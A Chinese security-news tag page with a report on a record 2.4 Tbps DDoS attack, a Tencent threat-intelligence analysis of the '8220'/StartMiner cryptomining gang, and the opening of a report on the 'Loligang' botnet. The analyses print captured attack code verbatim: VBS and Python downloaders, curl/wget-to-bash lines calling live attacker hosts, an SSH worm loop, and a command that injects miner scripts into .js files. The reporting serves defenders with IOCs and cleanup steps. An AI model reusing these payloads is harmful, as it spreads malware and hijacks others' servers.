标签: DDoS攻击

微软称其抵挡了有史以来最大的 DDoS 攻击 带宽负载高达 2.4 Tbps

微软披露其已经缓解了一场发生于8月份的2.4Tbps分布式拒绝服务(DDoS)攻击。这次攻击针对欧洲的一个Azure客户,比微软在2020年记录的最高攻击带宽量高出140%。它也超过了之前最大的攻击2.3Tbps的峰值流量,这是在去年针对亚马逊网络服务的攻击。 微软表示,这次攻击持续了10多分钟,短暂的流量爆发峰值为2.4Tbps,随后下降到0.55Tbps,最后回升到1.7Tbps。DDoS攻击通常用于迫使网站或服务脱机,这要归功于网络主机无法处理的大量流量。它们通常是通过僵尸网络进行的,僵尸网络是一个使用恶意软件或恶意软件进行远程控制的机器网络,Azure能够在整个攻击过程中保持在线,这要归功于它吸收数十Tbit DDoS流量攻击的能力。 “攻击流量来自大约7万个来源,包含来自亚太地区的多个国家,如马来西亚、越南、日本等国家以及美国本土,”微软Azure网络团队的高级项目经理Amir Dahan解释说。 虽然2021年Azure上的DDoS攻击数量有所增加,但在8月最后一周的这次2.4Tbps攻击之前,最大攻击吞吐量已经下降到625Mbps。微软没有说出被攻击的欧洲Azure客户的名字,但这种攻击可以作为二次攻击的掩护,特别是在试图传播恶意软件和渗透到公司系统的过程中。 亚马逊网络服务(AWS)之前保持着最大的DDoS攻击防御的记录,也就是上面所说的2.3Tbps的尝试,超过了NetScout Arbor在2018年3月保持的1.7Tbps的前记录。   (消息及封面来源:cnBeta)

“8220”挖矿木马入侵服务器挖矿,组建“海啸”僵尸网络,预备发起DDoS攻击

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/X0LeyXch6Bsa_2aF-cItXQ   一、背景 腾讯安全威胁情报中心检测到“8220”挖矿木马变种攻击。“8220”挖矿团伙擅长利用WebLogic、JBoss反序列化漏洞,Redis、Hadoop未授权访问漏洞等Web漏洞攻击服务器挖矿。近期我们发现该团伙在攻击活动中通过Apache Struts远程代码执行漏洞(CVE-2017-5638)、Tomcat弱口令爆破进行传播的木马大幅增加。 木马在横向移动阶段会利用Python实现的Redis未授权漏洞访问漏洞对随机生成的约16万个IP进行扫描攻击,并且利用植入的shell脚本hehe.sh继续利用已有公钥认证记录的机器建立SSH连接进行内网扩散,最终在失陷机器植入多款门罗币挖矿木马以及Tsunami僵尸网络木马,后者被该团伙用来进行DDoS攻击。 “8220”挖矿木马团伙的攻击目标包括Windows和Linux服务器,在其使用的FTP服务器上,可以发现针对不同操作系统的攻击模块。该团伙释放挖矿木马时,会检查服务器是否有其他挖矿木马运行,将所有竞争挖矿木马进程结束,以独占服务器资源。 根据代码的相似性、C2关联性、挖矿时使用的相同门罗币钱包以及配置文件解密方法、相似的FTP服务器,腾讯安全专家认为,2020年初出现的StartMiner与“8220”挖矿木马属于同一团伙。该团伙当前版本恶意程序与C2服务器的通信已不再使用“8220”端口,根据近期捕获到的样本对其攻击偏好使用的文件名进行总结,发现其具有使用多种脚本包括VBS、PHP、Python、Powershell、Shell进行组合攻击的特点。 二、解决方案 企业运维人员可参考以下方法手动清除Linux和Windows系统感染的挖矿木马,参考安全建议提升服务器的安全性。 Linux系统 a. Kill进程/tmp/sh、/tmp/x32b、/tmp/x64b b. 删除文件 /tmp/i686(md5: D4AE941C505EE53E344FB4D4C2E102B7)、 /tmp/ x86_64(md5: 9FE932AC3055045A46D44997A4C6D481) /tmp/x32b(md5: EE48AA6068988649E41FEBFA0E3B2169)、 /tmp/x64b(md5: C4D44EED4916675DD408FF0B3562FB1F) c.  删除包含“www.jukesxdbrxd.xyz”、“107.189.11.170”的crontab计划任务 安全建议: a. Redis 非必要情况不要暴露在公网,使用足够强壮的Redis口令 b. Tomcat服务器配置高强度密码认证 c.  设置ssh非交互方式登录时StrictHostKeyChecking=ask或StrictHostKeyChecking=yes Windows系统 a. 杀死进程isassx.exe、steamhuby.exe、issaasss、isasss.exe、ready.exe、oity.exe、kkw2.exe、12.exe、13.exe、mess.exe b. 删除文件: c:\windows\temp\app.vbs c:\windows\temp\apps.vbs C:\Windows\Temp\ready.exe C:\ProgramData\guvpgnkpwv\steamhuby.exe C:\ProgramData\tumtkffywq\issaasss C:\Windows\temp\12.exe C:\Windows\temp\12.exe C:\Windows\Temp\mess.exe %HOMEPATH%\why.ps1 %HOMEPATH%\schtasks.ps1 c.  删除执行内容包含“why.ps1、why2.ps1、why3.ps1、kkmswx.ps1”的计划任务 安全建议: 及时修复Apache Struts高危漏洞; Tomcat服务器配置高强度密码认证。 推荐政府机构、大中型企业、科研单位采用腾讯安全完整解决方案全面提升信息系统的安全性。 腾讯安全解决方案部署示意图(图片可放大) 政企用户可根据业务应用场景部署适当的安全产品,并根据腾讯安全威胁情报中心提供的情报数据配置各节点联防联动、统一协调管理,提升整体网络抗攻击能力。 腾讯安全系列产品应对8220挖矿木马的响应清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)8220挖矿木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)8220挖矿木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞相关联的IOCs已支持识别检测; 2)支持下发访问控制规则封禁目标端口,主动拦截Redis未授权访问漏洞相关访问流量。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持Apache Struts远程命令执行漏洞、Redis未授权访问漏洞的检测; 2)已支持查杀8220挖矿木马家族样本。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 网络资产风险监测系统 (腾讯御知) 1)腾讯御知已支持监测全网资产是否受Apache Struts远程命令执行漏洞、Redis未授权访问漏洞影响。 关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://s.tencent.com/product/narms/index.html 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞相关联的IOCs已支持识别检测; 2)对利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞入侵的相关协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀8220挖矿木马团伙入侵释放的后门木马程序、挖矿木马程序; 2)企业终端管理系统已支持检测黑产利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞入侵相关的网络通信。 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 三、利用Struts漏洞(CVE-2017-5638)入侵服务器挖矿 Apache Struts是一款用于创建企业级Java Web应用的开源框架,Struts2存在远程代码执行的严重漏洞(漏洞编号S2-045,CVE编号:CVE-2017-5638),并定级为高风险,影响版本范围为Struts 2.3.5 – Struts 2.3.31和Struts 2.5 – Struts 2.5.10。 该漏洞能允许黑客远程代码执行,相当于整台服务器已托管给黑客,黑客可以利用此漏洞获取web应用的源程序,修改web应用内容,获取数据库密码并盗取数据库信息,更改系统代码,更改数据库密码等等。 黑客批量扫描Web服务器并针对存在CVE-2017-5638漏洞的机器进行攻击,然后通过shell写入VBS脚本文件app.vbs并启动运行。 c:\windows\temp\app.vbs代码内容如下: Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://www.jukesxdbrxd.xyz/steamhuby.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile “C:/Windows/temp/steamhuby.exe”,2 wscript.sleep 10000 Shell.Run (“C:/Windows/temp/steamhuby.exe”) Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://104.244.75.25/steamhuby.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile ” C:/Windows/temp/steamhuby.exe”,2 wscript.sleep 10000 Shell.Run (” C:/Windows/temp/steamhuby.exe”) Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://104.244.75.25/kmkww.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile ” C:/Windows/temp/kmkww.exe”,2 wscript.sleep 10000 Shell.Run (” C:/Windows/temp/kmkww.exe”) app.vbs下载得到挖矿木马母体steamhuby.exe,该样本拷贝自身到C:\ProgramData\guvpgnkpwv\steamhuby.exe,然后访问下载解密的更新配置文件url,将挖矿配置文件信息cfg、cfgi释放到该文件夹下。 该钱包目前在公开矿池pool.hashvault.pro挖矿获得30个XMR,但是由于其使用多个私有矿池挖矿,实际收益会远大于这个数目。 漏洞攻击时利用Shell执行的另一段VBS代码apps.vbs下载的挖矿木马为ww.exe,存放至C:/Windows/temp/12.exe或C:/Windows/temp/13.exe,并直接传入挖矿参数开启挖矿。 c:\windows\temp\apps.vbs内容如下: Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://jukesbrxd.xyz/ww.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile “C:/Windows/temp/12.exe”,2 wscript.sleep 10000 Shell.Run (“C:/Windows/temp/13.exe –donate-level=1 -k -o 37.59.162.30:5790 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B”) 四、爆破攻击Tomcat服务器挖矿 该团伙利用漏洞攻击成功后,会向目标服务器植入多款挖矿木马进行门罗币挖矿。 Tomcat 是由 Apache 开发的一个 Servlet 容器,实现了对 Servlet 和 JSP 的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全域管理和Tomcat阀等, /manager/html为tomcat自带管理功能后台,如果密码强度不高,容易被黑客破解入侵。 黑客针对Tomcat服务器进行扫描和暴力破解,然后将保存在FTP服务器上的PHP木马和VM木马下载到失陷机器,利用php木马继续下载挖矿木马。 Win.php 通过system执行cmd命令,利用certutil.exe下载ww.exe,存放至c:\windows\temp\kkw2.exe,传入参数开启挖矿:–donate-level=1 -k –max-cpu-usage 100 -o 23.94.24.12:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B 创建脚本kkmw.txt、kksw.txt,利用ftp命令从服务器ftp[:]//107.189.11.170下载kmkww.exe、ww.exe,传入挖矿参数启动挖矿; 创建下载脚本poc.vbs,并写入以下代码,下载ww.exe并启动挖矿: Set objXMLHTTP=CreateObject(“MSXML2.XMLHTTP”) objXMLHTTP.open “GET”,”http://107.189.11.170/ww.exe”,false objXMLHTTP.send() If objXMLHTTP.Status=200 Then Set objADOStream=CreateObject(“ADODB.Stream”) objADOStream.Open objADOStream.Type=1 objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position=0 objADOStream.SaveToFile “C:\Windows\Temp\mess.exe” objADOStream.Close Set objADOStream=NothingEnd if Set objXMLHTTP=Nothing Set objShell=CreateObject(“WScript.Shell”) objShell.Exec(“C:\Windows\Temp\mess.exe –donate-level 1 -o 23.94.24.12:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B”) 通过Powershell命令下载和执行3.ps1、2.ps1。 创建poc2.vbs,写入与poc.vbs类似的下载代码,下载kmkww.exe启动挖矿。 Linx.php 修改DNS服务器为8.8.8.8 安装Linux下载工具: apt-get install wget -y; yum install wget -y; apt-get install curl -y; yum install curl -y; 利用多个下载工具下载bash脚本2start.jpg并执行,运行后rm -rf删除文件: get -q -O – http://107.189.11.170/2start.jpg | bash -sh; url -fsSL http://107.189.11.170/2start.jpg | bash -sh; wget -q -O – http://107.189.11.170/2start.jpg | bash -sh; curl -fsSL http://107.189.11.170/2start.jpg | bash -sh; cur -fsSL http://107.189.11.170/2start.jpg | bash -sh; lwp-download http://107.189.11.170/2start.jpg /tmp/2start.jpg; bash /tmp/2start.jpg; rm -rf 2start.jpg; 解码base64编码的python脚本并运行,最后history -c删除记录。 Base64: cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xMDcuMTg5LjExLjE3MC9hLnB5IikucmVhZCgpKSc= 解码: python -c ‘import urllib;exec(urllib.urlopen(“http://107.189.11.170/a.py”).read())’ Base64: cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xMDcuMTg5LjExLjE3MC9iLnB5IikucmVhZCgpKSc= 解码: python -c ‘import urllib;exec(urllib.urlopen(“http://107.189.11.170/b.py”).read())’ Powershell 木马攻击Windows系统使用的3.ps1具有以下功能: 下载ww32.exe、kkw2.exe并保存至temp目录。 找到进程可能是其他挖矿木马的端口连接,杀死对应进程 将Powershell脚本why.ps1、why4.ps1安装为计划任务 “Update service for Oracle productsm”,并删除旧的计划任务。 匹配文件名,退出杀软进程和竞品挖矿木马进程,包括ddg.exe,然后启动自己的挖矿进程kkw2.exe。 Python 攻击Linux系统使用的linx.php会执行Python脚本a.py,该脚本负责下载32位、64位Linux系统版本挖矿木马i686、x86_64,并通过命令chomd设置读、写、运行三种权限,然后运行挖矿。 i686、x86_64是由XMRig程序编译的Linux版本挖矿木马 五、组建Tsunami僵尸网络进行DDoS攻击 b.py则下载32位、64位基于Linux系统的Tsunami(海啸)僵尸网络木马x64b、x32b。 Tsunami会利用远程代码执行漏洞,扫描、定位和攻击脆弱的系统,攻击成功会会导致僵尸网络完全控制设备。Tsunami通过IRC协议与C2服务器通信,接收指令并发起HTTP、UDP类型的DDoS攻击。 六、横向移动 利用Redis未授权访问漏洞 木马用于扫描攻击的ss2.py、ss3.py经过base64编码,解码后的内容都是下载new.py执行。 new.py首先生成待攻击的IP列表IP_LIST,其中方法一位获取本机IP的A段和B段,然后依次遍历0~256,1~256组成C段和D段;方法二为随机生成10万个IP,排除内网IP地址;最后把两种方法生成的IP合并到同一个列表得到约16万个IP。 对每个IP进行6379端口(Redis服务)探测连接,如果端口开放,继续判断是否存在Redis未授权访问漏洞。 Redis在默认情况下,会绑定在0.0.0.0:6379。如果没有采取相关的安全策略会使Redis服务完全暴露在公网上。如果在没有设置密码认证(一般为空)的情况下,攻击者可以在未授权访问Redis的情况下,利用Redis自身的提供的config命令,进行文件的读写等操作,包括将自己的ssh公钥写入到目标服务器的 /root/.ssh文件夹下的authotrized_keys文件中,进而可以使用对应的私钥直接使用ssh服务登录目标服务器。 如果被扫描IP存在Redis未授权访问漏洞,通过命令将curl、wget下载执行恶意脚本hehe.sh的代码写入crontab定时任务(写入“/var/spool/cron”、“/var/spool/cron/crontabs”),每1分钟执行一次。 curl -fsSLk -max -time 40 http[:]//jukesxdbrxd.xyz/hehe.sh -o ~/.ntp || wget –quiet –no-check-certificate –timeout=40 http[:]//jukesxdbrxd.xyz/hehe.sh -o ~/.ntp SSH连接 hehe.sh继续通过基于公钥认证的SSH攻击其他机器,从/.ssh/known_hosts中获取已认证的远程主机ID,与对应的机器建立SSH连接并执行命令下载恶意脚本hehe.sh: if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then   for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL http://www.jukesxdbrxd.xyz/hehe.sh||wget -q -O- http://www.jukesxdbrxd.xyz/hehe.sh)|bash >/dev/null 2>&1 &’ & done fi for file in /home/* do     if test -d $file     then         if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then             for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL http://www.jukesxdbrxd.xyz/hehe.sh||wget -q -O- http://www.jukesxdbrxd.xyz/hehe.sh)|bash >/dev/null 2>&1 &’ & done         fi     fi done hehe.sh还会通过crontab定时任务设置持久化,定期下载自身运行。 执行base64编码的Python脚本,重新获取Python攻击代码new.py(由ss2.py、ss3.py下载)并发起新的攻击。 I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cDovL3d3dy5qdWtlc3hkYnJ4ZC54eXovc3MzLnB5Jwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz 解码: #coding: utf-8 import urllib import base64 d= ‘http://www.jukesxdbrxd.xyz/ss3.py’ try:     page=base64.b64decode(urllib.urlopen(d).read())     exec(page) except:     pass 挖矿木马植入 hehe.sh还会查找“.js”文件并在其中插入js挖矿木马http[:]//t.cn/EvlonFh(长链接对应https[:]//xmr.omine.org/assets/v7.js) 插入命令: find / -name ‘*.js’|xargs grep -L f4ce9|xargs sed -i ‘$a\document.write\(‘\’\<script\ src=\”http://t.cn/EvlonFh\”\>\</script\>\<script\>OMINEId\(\”61adfe72ae314d8f86532b3cd1c60bda\”,\”-1\”\)\</script\>\’\)\; js挖矿木马所属网站: 最后下载负责运行Linux平台ELF挖矿木马的shell脚本2start.jpg、3start.jpg: if [ $? -eq 0 ] then pwd else curl -s http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh wget -q -O – http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh url -s http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh get -q -O – http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh curl -s http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh wget -q -O – http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh url -s http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh get -q -O – http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh fi 2start.jpg或3start.jpg判断Linux挖矿木马kworkerdss是否存在 不存在则下载挖矿程序x、xx,以及挖矿配置文件wt.conf。 七、关联家族分析 1.代码相似性 我们取被友商划归为8220挖矿木马的Powershell脚本1.ps1与近期被友商命名为StartMiner的Powershell脚本3.ps1进行对比: 1.ps1  afd9911c85a034902cf8cca3854d4a23 (下载地址:http[:]//192.99.142.248:8220/1.ps1) 3.ps1  faf53676fa29216c14d3698ff44893c8(下载地址:http[:]//www.jukesxdbrxd.xyz/3.ps1) (注:根据木马下载核心shell脚本使用的地址http[:]//www.jukesxdbrxd.xyz/3start.jpg,www[.]jukesxdbrxd.xyz应属于StartMiner) 8220挖矿木马使用的1.ps1的主要有4个功能: 1、下载挖矿木马 2、安装计划任务执行Powershell脚本(持久化),清除旧的计划任务 3、杀死竞品挖矿木马 4、启动挖矿木马 StartMiner使用的3.ps1功能与上述1.ps1完全一致,只是在下载挖矿木马时同时下载了两个文件,因此在启动挖矿进程时也启动相应的两个,增加了通过联网端口匹配竞品挖矿进程,对清除竞品挖矿木马的文件名单进行了补充。 两者相同的清除计划任务名单: “Update service for Oracle products” “Update service for Oracle products5” “Update service for Oracle products1” “Update service for Oracle products2” “Update service for Oracle products3” “Update service for Oracle products4” “Update service for Oracle products7” “Update service for Oracle products8” “Update service for Oracle products0” “Update service for Oracle products9” “Update service for Oracle productsa” “Update service for Oracle productsc” “Update service for Oracle productsm” 两者相同的清除竞品挖矿木马进程名单: ddg.exe yam.exe miner.exe xmrig.exe nscpucnminer32.exe 1e.exe iie.exe 3.exe iee.exe ie.exe je.exe im360sd.exe iexplorer.exe imzhudongfangyu.exe 360tray.exe 360rp.exe 360rps.exe pe.exe me.exe 2.共同的C2 37.44.212.223,作为8220挖矿木马C2:http[:]//37.44.212.223/rig,作为StartMiner C2:http[:]//37.44.212.223/x 3.门罗币钱包 “8220”挖矿木马与StartMiner挖矿木马都使用了门罗币钱包: 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ StartMiner: 由steamhuby.exe(8780219e4a6eb4bd1b618aee4167be5a)释放出挖矿配置文件cfg “8220”挖矿木马:由antspywares.exe(4b5df24b5deda127966029ce0fd83897)释放出配置文件cfg 并且steamhuby.exe和antspywares.exe解密挖矿配置文件时创建相同的互斥量“4e064bee1f3860fd606a”,使用相同的密钥:”0125789244697858″。 4. FTP服务器 都使用FTP服务器提供木马下载服务。 8220挖矿木马:ftp[:]//93.174.93.149 StartMiner:ftp[:]//107.189.11.170 基于上述特点我们认为2020年初开始出现的StartMiner与2017年被曝光的“8220”挖矿木马属于同一团伙,而该团伙在近期攻击过程中已不再具有明显的“8220”端口使用的特征。近期攻击过程中偏好使用的文件名如下: PE文件: isassx.exe、steamhuby.exe、kmkww.exe、haha.exe、hue.exe、xmrig1.exe、ww.exe、ww32.exe、x.jpeg、issaasss、xmrig.exe、ww2.exe、isasss.exe、ready.exe、oity.exe、kkw2.exe、12.exe、13.exe、mess.exe ELF文件: x86_64、i686、x64b、x32b、hxx、xx、x、1.so、Kworkerdss Linux Shell脚本: 2start.jpg、3start.jpg、response.jpeg、it.sh、go、go4、go3、hehe.sh、xdd.sh、start.sh Powershell脚本: 2.ps1、3.ps1、why.ps1、why2.ps1、why3.ps1、kkmswx.ps1 Python脚本: a.py、b.py、ss2.py、ss3.py、new.py VBS脚本: app.vbs、apps.vbs、poc.vbs PHP文件: linx.php、win.php VM文件(类似于JSP): linx.vm、win,vm、win2.vm txt文件: kmkww.txt、xmr.txt、config.txt、kkmw.txt、kksw.txt IOCS Domain jukesbrxd.xyz www.jukesxdbrxd.xyz IP 107.189.11.170 104.244.75.25 23.94.24.12 104.244.74.248 37.44.212.223 URL http[:]//jukesbrxd.xyz/isassx.exe http[:]//jukesbrxd.xyz/ww.exe http[:]//www.jukesxdbrxd.xyz/steamhuby.exe http[:]//www.jukesxdbrxd.xyz/new.py http[:]//www.jukesxdbrxd.xyz/xmr.txt http[:]//jukesxdbrxd.xyz/hehe.sh http[:]//104.244.75.25/steamhuby.exe http[:]//104.244.75.25/kmkww.exe http[:]//104.244.75.25/i686 http[:]//37.44.212.223/haha.exe http[:]//37.44.212.223/hue.exe http[:]//37.44.212.223/xmrig1.exe http[:]//37.44.212.223/xdxd.txt http[:]//107.189.11.170/a.py http[:]//107.189.11.170/b.py http[:]//107.189.11.170/3.ps1 ftp[:]//107.189.11.170/kmkww.exe ftp[:]//107.189.11.170/linx.php ftp[:]//107.189.11.170/linx.vm ftp[:]//107.189.11.170/win.php ftp[:]//107.189.11.170/win.vm ftp[:]//107.189.11.170/win2.vm ftp[:]//107.189.11.170/ww.exe http[:]//107.189.11.170/x64b http[:]//107.189.11.170/x32b http[:]//185.153.180.59/isassx.exe http[:]//104.244.74.248/x86_64 http[:]//23.94.24.12/kmkww.txt MD5 MD5 病毒名 8780219e4a6eb4bd1b618aee4167be5a Win32.Trojan.Inject.Auto 3c27fc39cccfdca4c38735ba6676364c Win32.Trojan.Inject.Auto ce854dd32e1d931cd6a791b30dcd9458 Win32.Trojan.Inject.Auto 64cb1856e9698cf0457a90c07a188169 Linux.Trojan.Shell.Loni c0ab986107d80f4ddbfdb46d3426244a Linux.Trojan.Shell.Djeg 46aeb7070c73c6f66171c0f86baf9433 Win32.Risk.Bitcoinminer.Pdwo a5c7c93fa57c1fc27cde28b047c85be6 Linux.Trojan.Bitcoinminer.Lnxv afd9911c85a034902cf8cca3854d4a23 Win32.Trojan.Generic.Lscf faf53676fa29216c14d3698ff44893c8 Win32.Trojan.Agent.Auto 3d99bd4a5916308685ab16ed64265b41 Linux.Trojan.Python.Dqdx 15e503acfa91f74b7a3de96cede5bde5 Linux.Trojan.Python.Hzqc 9fe932ac3055045a46d44997a4c6d481 Linux.Trojan.Miner.Rusg c4d44eed4916675dd408ff0b3562fb1f Linux.Backdoor.Tsunami.Ejrw ee48aa6068988649e41febfa0e3b2169 Linux.Backdoor.Tsunami.Amce d4ae941c505ee53e344fb4d4c2e102b7 Win32.Trojan.Miner.Buox c915dee2be8d698a02125caf8e0e938e Linux.Exploit.Redisattack.Kiqf 1e715be740f9f484c67d50f4f5b04d95 Linux.Exploit.Redisattack.Aqmo 25b8710947639ee3572c70f49eb3a207 Win32.Trojan-downloader.Miner.Hrzc e3e156053ef2ea06ae6c7dccba4ad7bc Linux.Backdoor.Phpshell.Gnnv c28cd1fd309d31d2db9a4776651bed4d Linux.Backdoor.Phpshell.Psdk d875b62187076116b9818249d57d565f Linux.Trojan.Miner.Uqid 矿池: 37.59.162.30:5790 23.94.24.12:8080 pool.hashvault.pro:80 钱包: 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ 参考链接: 新型IoT/Linux恶意软件针对DVR攻击组成僵尸网络 https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ 疑似国内来源的“8220挖矿团伙”追踪溯源分析 https://mp.weixin.qq.com/s/oUV6iDvIrsoiQztjNVCDIA “8220团伙”最新活动分析:挖矿木马与勒索病毒共舞 https://mp.weixin.qq.com/s/CPHRAntQAflcJr_BcNnNUg 8220团伙新动向:利用Aapche Struts高危漏洞入侵,Windows、Linux双平台挖矿 https://mp.weixin.qq.com/s/sO8sXWKVWCHS6upVc_6UtQ 抗“疫”时期,谨防服务器被StartMiner趁机挖矿! https://mp.weixin.qq.com/s/4350pUlXYXTMyYEAzztwQQ

腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起 DDoS 攻击

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/jPA0lCbSi_JLkEn3WoMH7Q   背景 近期腾讯安全御见威胁情报中心监测到一个名为“萝莉帮(Loligang)”的跨平台僵尸网络,可发起DDoS攻击。组成“萝莉帮(Loligang)”僵尸网络的电脑包括Windows服务器、Linux服务器以及大量IoT设备,木马类型包括Nitol、XorDDoS和Mirai。 根据监测数据,受攻击的系统中有较高比例为Weblogic服务器,且攻击时执行的远程脚本中包含VM脚本(在web服务端模板velocity环境执行),推测此次攻击中采用了各类Web漏洞利用。 Nitol木马入侵Windows系统后会通过IPC$弱口令爆破感染内网中的其他机器,然后连接控制端地址,接受控制指令进行DDoS攻击。感染Linux系统的XorDDoS会在/etc/init.d中创建副本,然后创建一个新的cron.sh脚本并将其添加到定时任务,最终目标为对其他机器发起DDoS攻击。Mirai病毒感染IoT设备,根据不同的CPU架构植入不同的二进制文件,然后对随机生成的IP地址进行探测攻击,接受指令对目标发起DDoS攻击。 “萝莉帮”僵尸网络的组建 详细分析 黑客在HFS服务器http[:]/103.30.43.120:99、http[:]/222.186.52.155:21541 上保存了大量的脚本及木马文件,包括命名后缀为png、vm、sh的脚本,windows平台运行的PE格式文件,Liunx平台运行的ELF格式文件 感染Windows系统 入侵Windows系统后,首先通过以下命令执行远程代码2.png: regsvr32 /u /s /i:http://103.30.43.120:99/2.png scrobj.dll 接着2.png执行Powershell脚本下载Nitol木马ism.exe,保存为json.exe并启动: ism.exe复制自身到windows目录下,重命名为6位随机名,并将自身安装为服务启动。安装的服务名为: “wdwa”,服务描述为:“Microsoft .NET COM+ Integration with SOAP” 创建新的副本,然后将原木马文件删除 释放加载资源文件 通过IPC$爆破横向传播 爆破使用内置的弱口令密码 完成IPC$共享感染后,病毒程序就会创建线程,连接C2服务器,接受并执行来自于C2服务器的指令。解密C2地址,密文为EhMQHRATHRcQHRIREwkLEwsTQw==,Nitol木马的显著标志为的解密算法:base64+凯撒移位+异或。 解密得到的C2地址为:103.30.43.120:8080 发送上线信息 下载执行程序 更新 使用iexplore.exe打开指定网页 执行DDoS攻击 感染Linux系统 根据HFS服务器上的文件命名特征”weblogic.sh”,以及被攻击系统中存在大量的Weblogic服务器,推测黑客针对存在Weblogic漏洞的服务器进行批量扫描攻击。 